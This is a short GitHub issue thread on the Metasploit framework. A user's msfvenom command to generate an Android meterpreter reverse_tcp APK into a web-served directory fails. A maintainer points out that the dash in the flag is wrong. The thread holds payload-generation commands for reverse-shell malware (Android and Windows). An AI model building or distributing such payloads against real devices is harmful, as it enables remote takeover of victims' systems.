### ISSUE TITLE
cannot find android/meterpreter/reverse/tcp

### ISSUE THREAD

**Issue by pranavpanka** [rapid7/metasploit-framework#13927]
root@kali:/opt/metasploit-framework/bin# msfvenom –p android/meterpreter/reverse_tcp LHOST=@t LPORT=4444 R> /var/www/html/ilu12.apk

Error: No options

MsfVenom - a Metasploit standalone payload generator.

Also a replacement for msfpayload and msfencode.

Usage: /opt/metasploit-framework/bin/../embedded/framework/msfvenom [options] <var=val>

Example: /opt/metasploit-framework/bin/../embedded/framework/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe

as u can see no android payload is available in msfvenom..

any solution for this?

i have also checked in payload option but creating an android payload is not available
i am able to create windows payload using msfvenom

**Comment by bcoles** [comment]
`msfvenom` is failing to parse the provided command line arguments, resulting in `Error: No options`.

You must use ` -p` not ` –p`.
